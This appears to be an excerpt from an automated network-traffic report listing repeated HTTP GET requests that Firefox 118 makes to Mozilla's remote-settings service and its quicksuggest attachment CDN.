Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/d9c6e436-11b1-4ae1-8d6f-e109d59d5069 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/41a4b1d8-9773-4011-ab45-8d749a67cebd HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/16ab4d01-9f0c-4fb9-bc87-cfcbe230a838 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/ae974b57-6287-44fb-a8d4-9c2ba83914fc HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/0fadd772-b5da-4b3f-9153-9ed8d41930f7 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/661cc2b3-833b-4044-a93a-a208f3d6fd1c HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/bfaa2e89-f7e3-478e-b83d-3bf27fc2c00f HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/d6977194-0ec3-4aef-b861-5cb96278213d HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/d7f071e9-d3de-4df6-9079-ca2e3ecddc08 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/c8ad0165-121f-4bc8-bdd1-a2822cb41726 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/d31608f2-3b9f-449e-ab6f-bfa39d6e5b7e HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/9532c448-e8d8-4f5d-9c67-0f0eba020af8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/d2b0ec78-51ee-4da9-9eda-88c3d4ff820a HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/2ac3379b-3190-40b9-b9a2-a824fcea8c53 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/d03657b0-717f-46ce-ac76-f69d851cb204 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/97c48ac8-6851-4bb9-8fd8-0ec4ff6093f9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/67ed17cc-443d-441a-8fed-df75291d73f0 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/b21f3c4f-4dd2-4fe0-8357-c6298a3a05da HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/26507d2d-8c51-42b6-b2fe-2028454d4651 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/d4e275ab-c7a1-4d16-9407-d03d849b8e21 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/7cc0fd66-fa48-46f1-9a0e-537764d9a4da HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/e9c18a75-e614-4528-aa5b-083cbfe4f6f9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/fe7b59a0-3469-46d2-a0a9-f7002bf0d746 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/05965656-d778-4160-87a2-82189597bec4 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/f5c2d820-dcad-4846-b0d5-4e73dfe3fb89 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/021a8f00-3de7-4da0-a723-1e308f3de9f9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/4e4ea300-9fea-4246-94b1-f3edfe89afb8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/d7131cfd-b567-49d1-8f01-69df01534e13 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/2799ba3f-afb9-458a-b1c4-fad5281a924f HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/b3dbd278-2094-48b0-a46a-81e3510b5463 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/64ae626e-5ef5-4753-80c5-8e21185f87fd HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/189d4073-cca2-4df0-a7b5-9d16bbea3530 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/8eb28f23-93ae-4186-87e6-0dfb5f0b1680 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/d940c3cc-b54d-46ec-ba62-cd986567e930 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/aa9a9e98-a819-4fe9-8780-fe2740740109 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/bb671625-edff-45f6-aa62-003dc3afbbbc HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/0386bbdc-6ab6-4665-8e19-05f505e7088f HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/dfea7ddb-648f-4b1c-a906-c9899851d559 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/953ce342-0dba-4d8c-b84d-300c8b1df4ac HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/91ef2bf1-a36b-48dd-914e-195981ce7ea7 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/ddb01327-71d3-427b-8f25-2666ca1019bf HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
